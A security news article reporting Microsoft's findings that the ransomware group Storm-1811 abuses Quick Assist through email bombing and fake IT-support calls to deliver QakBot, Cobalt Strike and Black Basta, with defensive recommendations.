The Microsoft Threat Intelligence team said it has observed a threat it tracks under the name Storm-1811 abusing the client management tool Quick Assist to target users in social engineering attacks.
“Storm-1811 is a financially motivated cybercriminal group known to deploy Black Basta ransomware,” the company said in a report published on May 15, 2024.
The attack chain involves the use of impersonation through voice phishing to trick unsuspecting victims into installing remote monitoring and management (RMM) tools, followed by the delivery of QakBot, Cobalt Strike, and ultimately Black Basta ransomware.
“Threat actors misuse Quick Assist features to perform social engineering attacks by pretending, for example, to be a trusted contact like Microsoft technical support or an IT professional from the target user’s company to gain initial access to a target device,” the tech giant said.
Quick Assist is a legitimate application from Microsoft that enables users to share their Windows or macOS device with another person over a remote connection, mainly with the intent to troubleshoot technical issues on their systems. It comes installed by default on devices running Windows 11.
To make the attacks more convincing, the threat actors launch link listing attacks, a type of email bombing attack in which the targeted email addresses are signed up for various legitimate email subscription services to flood their inboxes with subscribed content.
The adversary then masquerades as the company’s IT support team through phone calls to the target user, purporting to offer assistance in remediating the spam issue and granting them access to their device through Quick Assist.
“Once the user allows access and control, the threat actor runs a scripted cURL command to download a series of batch files or ZIP files used to deliver malicious payloads,” the Windows maker said.
“Storm-1811 leverages their access and performs further hands-on-keyboard activities such as domain enumeration and lateral movement. Storm-1811 then uses PsExec to deploy Black Basta ransomware throughout the network.”
Microsoft said it’s taking a close look at the misuse of Quick Assist in these attacks and that it’s working on incorporating warning messages in the software to notify users of possible tech support scams that could facilitate ransomware delivery.
The campaign, believed to have commenced in mid-April 2024, has targeted a variety of industries and verticals, including manufacturing, construction, food & beverage, and transportation, Rapid7 said, indicating the opportunistic nature of the attacks.
“The low barrier of entry into conducting these attacks, coupled with the significant impacts these attacks have on their victims, continue to make ransomware a very effective means to an end for threat actors seeking a payday,” Robert Knapp, senior manager of incident response services at Rapid7, said in a statement shared with The Hacker News.
Microsoft has also described Black Basta as a “closed ransomware offering” as opposed to a ransomware-as-a-service (RaaS) operation that comprises a network of core developers, affiliates, and initial access brokers who conduct ransomware and extortion attacks.
It is “distributed by a small number of threat actors who typically rely on other threat actors for initial access, malicious infrastructure, and malware development,” the company said.
“Since Black Basta first appeared in April 2022, Black Basta attackers have deployed the ransomware after receiving access from QakBot and other malware distributors, highlighting the need for organizations to focus on attack stages prior to ransomware deployment to reduce the threat.”
Organizations are recommended to block or uninstall Quick Assist and similar remote monitoring and management tools if not in use and train employees to recognize tech support scams.
